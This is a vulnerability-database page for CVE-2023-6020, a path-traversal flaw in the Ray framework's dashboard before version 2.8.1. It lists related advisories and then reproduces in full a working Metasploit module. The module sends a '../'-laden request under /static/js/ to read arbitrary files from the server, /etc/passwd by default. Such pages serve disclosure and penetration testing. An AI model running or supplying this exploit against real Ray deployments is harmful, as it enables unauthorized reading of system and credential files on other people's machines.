Ray Static Arbitrary File Read

🗓️ 31 Aug 2024 00:00:00Reported by byt3bl33d3r, Takahiro Yokoyama, danmcinerney, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 147 Views

Ray Static Arbitrary File Read vulnerability in Ray version before 2.8.1

Reporter	Title	Published	Views	Family All 34
BDU FSTEC	The vulnerability of the AI application scaling framework and Python Ray, related to an incorrect path name limitation for the restricted access catalog, allows attackers to read arbitrary files.	3 Apr 202400:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the dashboard component of the application scaling framework for AI and Python Ray applications, which allows a hacker to execute arbitrary commands.	3 Apr 202400:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the AI application scaling framework and Python Ray, related to deficiencies in the authentication process, allows attackers to read arbitrary files from the /static/ directory.	3 Apr 202400:00	–	bdu_fstec
Circl	CVE-2023-6020	25 Nov 202312:14	–	circl
CNNVD	Ray Security breach	16 Nov 202300:00	–	cnnvd
CVE	CVE-2023-6020	16 Nov 202321:07	–	cve
Cvelist	CVE-2023-6020 Ray Static File Local File Include	16 Nov 202321:07	–	cvelist
Github Security Blog	Ray Path Traversal vulnerability	16 Nov 202318:30	–	github
Github Security Blog	Ray Missing Authorization vulnerability	16 Nov 202321:30	–	github
Metasploit	Ray static arbitrary file read	23 Aug 202418:52	–	metasploit

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Ray static arbitrary file read',  
'Description' => %q{  
Ray before 2.8.1 is vulnerable to a local file inclusion.  
},  
'Author' => [  
'byt3bl33d3r <[email protected]>', # Python Metasploit module  
'danmcinerney <[email protected]>', # Python Metasploit module  
'Takahiro Yokoyama' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2023-6020'],  
['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],  
['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']  
],  
'DisclosureDate' => '2023-11-15',  
'Notes' => {  
'Stability' => [ CRASH_SAFE, ],  
'SideEffects' => [ IOC_IN_LOGS, ],  
'Reliability' => []  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(8265),  
OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])  
]  
)  
end  
  
def check  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'api/version')  
})  
return Exploit::CheckCode::Unknown unless res && res.code == 200  
  
ray_version = res.get_json_document['ray_version']  
  
return Exploit::CheckCode::Unknown unless ray_version  
  
return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')  
  
file_content = lfi('/etc/passwd')  
return Exploit::CheckCode::Vulnerable unless file_content.nil?  
  
Exploit::CheckCode::Appears  
end  
  
def lfi(filepath)  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")  
})  
return unless res && res.code == 200  
  
res.body  
end  
  
def run  
file_content = lfi(datastore['FILEPATH'])  
fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content  
print_good("#{datastore['FILEPATH']}\n#{file_content}")  
end  
  
end  
`

31 Aug 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.5

CVSS 37.5

EPSS0.81449